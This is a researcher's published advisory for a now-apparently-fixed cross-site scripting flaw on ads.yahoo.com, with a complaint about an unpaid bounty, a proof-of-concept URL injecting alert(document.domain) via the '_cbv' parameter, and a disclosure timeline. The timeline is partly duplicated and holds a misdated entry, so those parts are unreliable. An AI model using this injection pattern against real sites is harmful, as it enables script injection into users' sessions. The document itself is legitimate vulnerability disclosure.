Yahoo Bug Bounty Program Vulnerability #1 XSS on ads.yahoo.com
In Nov ’13 I reported a Cross-site Scripting vulnerability to the Yahoo Bug Bounty Program. As for my other reports, I’ve got no response or feedback, so I wrote a message to them via email this time and so on … blah blah :)
To cut a long story short, for all my reports the communication with Yahoo was really bad and of course: No bounty!
It seems this XSS is fixed, so here is my advisory:
Advisory:
|
Yahoo Bug Bounty Program Vulnerability #1 XSS on ads.yahoo.com
|
Advisory ID:
|
SSCHADV2013-YahooBB-001
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on ads.yahoo.com
|
Vendor URL:
|
|
Vendor Status:
|
Seems to be fixed
|
Bounty:
|
nothing
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The ‘_cbv’-Paramter on "http://ads.yahoo.com" is prone to a Cross-site Scripting vulnerability
======================
PoC-Exploit
======================
PoC-Exploit
======================
http://ads.yahoo.com/st?ad_type=iframe&ad_size=300×250&site=1181425§ion_code=112260532&
cb=1385497647.226089&publisher_blob=${RS}|gmGLFTE4OC4mbYnzUpH6dwEQOTMuMlKVBC__yxq4
|2143911627|LREC2|1385497647.226089&yud=smpv%3d3%26ed%3dzxE1dF31xQzMnXQidpJpWNtP
OVygJhcHBknzVCnpTraLTXtt8jO7OEVYpCbxEhJcwmU2x.ekTqffsDUVYgceDTs.NijijL.tGPKwsdRUsLvxftzYGe
.0VUghSSHioqjLjQJ7KaidIocpC1oj2SKC4lg_EhLiMsmgXiq6wbNVL_VzG1fHxP77ptF04VC7jL7lL1vr0iRs.r6
8cRSLiFUFzH_pvnaxUy8-&_msd=1&_xcf=1&_exv=RDnhGI4wnN7uv.jS65VPBVAFmZBbevIBHZGnRIl5vxDV&_msig=10sorm5kd&rmxbkn=0&_cbv=132025816&81c91"-alert(document.domain)-"1580bfdcb31=1
|
======================
Disclosure Timeline
======================
28-Nov-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 – next message to the Yahoo Securiy Contact
04-Jan-2014 – feedback from vendor
04-Jan-2014 – vendor informed again about the three vulnerabilities
06-Jan-2014 – feedback from vendor
15-Jan-2014 – contact with Jeff Zingler (Threat Response@Yahoo)
31-Dec-2013 – next message to the Yahoo Securiy Contact
04-Jan-2014 – feedback from vendor
04-Jan-2014 – vendor informed again about the three vulnerabilities
06-Jan-2014 – feedback from vendor
15-Jan-2014 – contact with Jeff Zingler (Threat Response@Yahoo)
16-Jan-2013 – contact with Jeff Zingler (Threat Response@Yahoo) // last contact
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-001.txt
Comments
Display comments as Linear | Threaded